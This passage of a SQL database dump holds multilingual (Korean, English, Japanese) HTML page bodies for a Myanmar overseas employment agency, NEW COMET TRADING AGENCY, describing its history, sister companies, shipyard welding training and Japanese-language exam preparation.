Gothic&quot;;mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일본으로 취업비자</span><span style=\"mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">연수비자로 가기</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">위해</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">필요한</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">자격시험</span><span style=\"mso-fareast-language:KO;\">(JLPT, JFT, NAT-TEST, TOP-J)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">에</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">합격할</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">수</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있도록</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">어학당도</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">개설</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">및 교육을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">지원하고</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있습니다</span><span style=\"mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">저희는</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">”</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>뉴코멧</strong></span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>해외직업소개회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"><strong>”&nbsp;</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-bidi-font-weight:bold;mso-fareast-language:KO;\" lang=\"KO\">는</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">미얀마에서</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">우수한</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기능인력을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">배출하여</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">해외로</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">파견하는</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">서비스를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공하기</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">위해</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">끊임없이</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">노력하고</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있습니다</span><span style=\"mso-fareast-language:KO;\">.</span><o:p></o:p><o:p></o:p></p>', '', 'full_html'),
('page', 0, 23, 191, 'en', 0, '<p>&nbsp;<span style=\"font-size:14.0pt;line-height:107%;\">We, ``NEW COMET TRADING\'\' company, was established in 2004 and started operating with company registration number (295/2004-2005).</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">NEW COMET TRADING AGENCY Co.,Ltd (New Comet Overseas Employment Agency) licence was obtained in 2023 and since then, the company has started to carry out service activities.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">&nbsp;We, ``NEW COMET TRADING AGENCY\'\' company, which is a brother company, such as, ZEYA NEW COMET Auto Sale &amp; Services Co.,Ltd, NEW COMET Co.,Ltd, have applied for vehicle import permits from the Ministry of Economy and Commerce, and have been working for more than 25 years in the business of buying, importing and selling various types of business trucks, tourism and transportation buses and machinery directly from Japan, and have paid the taxes set for the state. More than 100 employees were given employment opportunities.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">In addition, brother companies such as NEW COMET Construction Co.,Ltd, NEW ZAYYA SHWE PYI Construction Co.,Ltd, AUNG NAY WUN Construction Co.,Ltd and other companies have also successfully won tenders from government ministries and have provided employment opportunities to more than 200 employees.</span></p><p><span style=\"font-size:14.0pt;line-height:107%;\">Our company \"NEW COMET TRADING AGENCY “company is currently providing welding training courses to become qualified skilled workers at the Sinmalike Shipyard for ethnic brothers from all over Myanmar who want to work in Korea\'s shipyards and connect them with job opportunities.&nbsp;</span></p><p><o:p></o:p><span style=\"font-size:14.0pt;line-height:107%;\">In addition, we are connecting job opportunities for young people who want to work in countries such as Dubai, Malaysia, Singapore, Thailand, and Japan.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">We at NEW COMET TRADING AGENCY Co.Ltd, are assisting on responsible for learning about Japan\'s developed advanced technologies, cultures and expressing their personal abilities and goals for the young generation in Myanmar.&nbsp;</span></p><p><o:p></o:p><span style=\"font-size:14.0pt;line-height:107%;\">In order to successfully pass the qualification tests (JLPT, JFT, NAT-TEST, TOP-J) required to go to Japan with a Work Visa and Training Visa, we are opening language training schools and providing teaching support.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">We, \"NEW COMET TRADING AGENCY\" company, is constantly striving to provide services that produce talented skilled workers from Myanmar and send them to foreign countries.</span></p><img src=\"/sites/default/files/inline-images/page01.jpg\" data-align=\"center\" data-entity-uuid=\"bb0a6309-0480-4e15-977d-7779b6ab5882\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page02.jpg\" data-align=\"center\" data-entity-uuid=\"3d648acd-e4d6-422e-96ec-0f4ef8a0ddaa\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page03.jpg\" data-align=\"center\" data-entity-uuid=\"b4e48cbd-91b4-4348-a15c-c383659f5dff\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page04.jpg\" data-align=\"center\" data-entity-uuid=\"f62451bb-2aa5-4267-9cf7-76b35949208e\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page05.jpg\" data-align=\"center\" data-entity-uuid=\"f7fdcca7-3b28-4e95-9a70-f8ca466d9476\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page06.jpg\" data-align=\"center\" data-entity-uuid=\"565a7606-51ac-43fc-9c7a-1f2fe7c3935d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page07.jpg\" data-align=\"center\" data-entity-uuid=\"241602f2-5bf8-4040-8551-8abbc9990697\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page08.jpg\" data-align=\"center\" data-entity-uuid=\"4ee88431-32e2-499a-873a-72b73c80dd87\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page09.jpg\" data-entity-uuid=\"f14ca664-92dd-4ef8-ac3e-6d7665765749\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page10.jpg\" data-entity-uuid=\"1bafeb42-76e2-496a-a9bb-90b065a98e37\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page11.jpg\" data-entity-uuid=\"9e05184a-372e-4ef0-aec6-040a7de4d8b5\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page12.jpg\" data-entity-uuid=\"e5ff5315-6ae9-4838-b6d0-5df07c2ac651\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page13.jpg\" data-entity-uuid=\"d8e1cc86-6131-4a2c-9b1a-387a91c23038\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page14.jpg\" data-entity-uuid=\"9b73fa8d-862d-4337-80d5-bbf9a45b1135\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page15.jpg\" data-entity-uuid=\"99d39ec1-71a6-43ab-9303-45f7f07a6c01\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page16.jpg\" data-entity-uuid=\"db0f80ea-271e-4bc0-85c9-e33617ed58be\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page17.jpg\" data-entity-uuid=\"249cb91a-e2ab-42f1-880d-08e1d3661363\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page18.jpg\" data-entity-uuid=\"1648c123-aec8-4914-94b5-6f74fc86d322\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page19.jpg\" data-entity-uuid=\"1483aff7-adb3-4f9d-bba2-26c25de4af05\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page20.jpg\" data-entity-uuid=\"e8ecf841-902b-4d50-a3db-9e840b757bb0\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page21.jpg\" data-entity-uuid=\"c1febdfa-ff0f-4b40-85b8-662e08593da9\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page22.jpg\" data-entity-uuid=\"2fa91eac-f8ad-4e49-a4ed-f30c44a54f97\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page23.jpg\" data-entity-uuid=\"01f43faf-2b33-446b-b89b-c870d79d8382\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page24.jpg\" data-entity-uuid=\"67b85639-9d9b-4dba-9e7e-104386c5d10b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page25.jpg\" data-entity-uuid=\"a59b58d5-c9f3-44ec-8705-b4cae7c7abea\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page26.jpg\" data-entity-uuid=\"1ad640d5-c50a-4585-8518-2626580dcf51\" data-entity-type=\"file\"><img data-entity-uuid=\"6ba5b697-692e-4e17-95d5-30299f4c7807\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/page27.jpg\"><img data-entity-uuid=\"ec9ac328-ce1c-4c50-bf7c-cee9f6ffc7bf\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/page28.jpg\"><img data-entity-uuid=\"459f3255-eeea-4f27-952a-43eeef000608\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/page29.jpg\"><img data-entity-uuid=\"b24121df-13a4-4612-ab32-c11ca913e9f2\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/page30.jpg\">', '', 'full_html'),
('page', 0, 23, 191, 'ja', 0, '<p class=\"MsoNormal\"><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">当社は</span><span style=\"mso-bidi-font-size:10.5pt;\">2004</span><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">年に設立し、登録</span><span style=\"mso-bidi-font-size:10.5pt;\">ID(295/2004</span><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">ー</span><span style=\"mso-bidi-font-size:10.5pt;\">2005)</span><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">を持ち、サービスの提供を行ってきました。ニューコメットトレンディーグ海外エイジェンシー登録を</span><span style=\"mso-bidi-font-size:10.5pt;\">2023</span><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">年にできまして、運営を始めました。</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">ニューコメットトレーディング会社のグループ会社である</span><span style=\"mso-bidi-font-size:10.5pt;\">.</span><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">ゼィーヤーニューコメットとしては自動車輸入許可をもらって現場用トラックや、旅行用と交通機関などに使用されるバスや色々な機械を日本から直接輸入をし、販売する事業を</span><span style=\"mso-bidi-font-size:10.5pt;\">25</span><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">年間やり続けてきました。税金の納税もしっかり行なった上、</span><span style=\"mso-bidi-font-size:10.5pt;\">100</span><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">人の従業員を持つ事ができました。</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">それに、グループ会社であるニューコメットト建築会社、ゼィーヤシュェピーティー建築会社、アウンネーウィン建築会社でも政府からきょかおたくさん頂き、</span><span style=\"mso-bidi-font-size:10.5pt;\">200</span><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">人程の従業員を持った会社として動いております。</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">現在、ニューコメットトレンディグエイジェンシーでは韓国の造船所で働きたいミャンマー全国から民族問わず、商務部の下でシンマライ湾岸で経験豊富な先生達の元で練習を重ねた研修をしていただき、仕事紹介をしております。</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">そして、ドバイ、マレーシア、シンガポール、タイ、日本にもお仕事紹介できる様に力を注いでおります。</span><o:p></o:p></p><p class=\"MsoNormal\"><span lang=\"JA\">ミャンマーの若者達には自分に合ったお仕事や自分らしさをたもちながら、日本の技術を勉強できるようにサポートをし続けたいと努力をしております。</span><o:p></o:p></p><p class=\"MsoNormal\"><span lang=\"JA\">日本語能力試験</span>(JLPT,<span style=\"mso-spacerun:yes;\">&nbsp; </span>JFT, NAT-TEST, TOP-J)<span lang=\"JA\">を合格した生徒はワークビザ、研修ビザなどて、いけるように提案をしております。</span><o:p></o:p></p><p class=\"MsoNormal\"><span lang=\"JA\">我々ニューコメットトレーディング会社からは経験豊富で、能力の高い研修生達を生み出し、海外の仕事チャンスを与えることに重ねて努力をしてまいります。</span><o:p></o:p></p>', '', 'full_html');
INSERT INTO `node_revision__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('page', 0, 23, 191, 'ko', 0, '<p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">저희</span><span style=\"mso-fareast-language:KO;\"> ``New Comet Trading\'\'&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">회사는</span><span style=\"mso-fareast-language:KO;\"> 2004</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">년에</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">설립되어</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">사업자등록번호</span><span style=\"mso-fareast-language:KO;\">(295/2004-2005)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">로</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">영업을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">시작하였습니다</span><span style=\"mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">뉴코멧무역대행</span><span style=\"mso-fareast-language:KO;\"> 2023</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">년</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">뉴코멧</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">외국인고용업</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">면허를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">취득하여</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">서비스</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">활동을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">시작하였습니다</span><span style=\"mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">저희 <strong>뉴코멧</strong></span><span style=\"mso-fareast-language:KO;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>해외직업소개회사</strong>&nbsp;</span><span style=\"mso-fareast-language:KO;\">\"New Comet Overseas Employment Agency\"</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">는자매</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">회사인&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-spacerun:yes;\" lang=\"KO\"> </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>제야뉴코멧 자동차 판매 및 서비스 회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">, </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>뉴코멧회사</strong>등</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기업들과</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">협력하여</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">경제통상자원부에서&nbsp;</span><span style=\"mso-fareast-language:KO;mso-spacerun:yes;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">차량</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">수입허가를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">신청했고</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">각종</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">상용트럭</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">, </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">관광</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">산업 및</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">운송에</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">사용되는</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">다양한</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">유형의</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">버스</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">및</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기계를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일본에서</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직접</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" 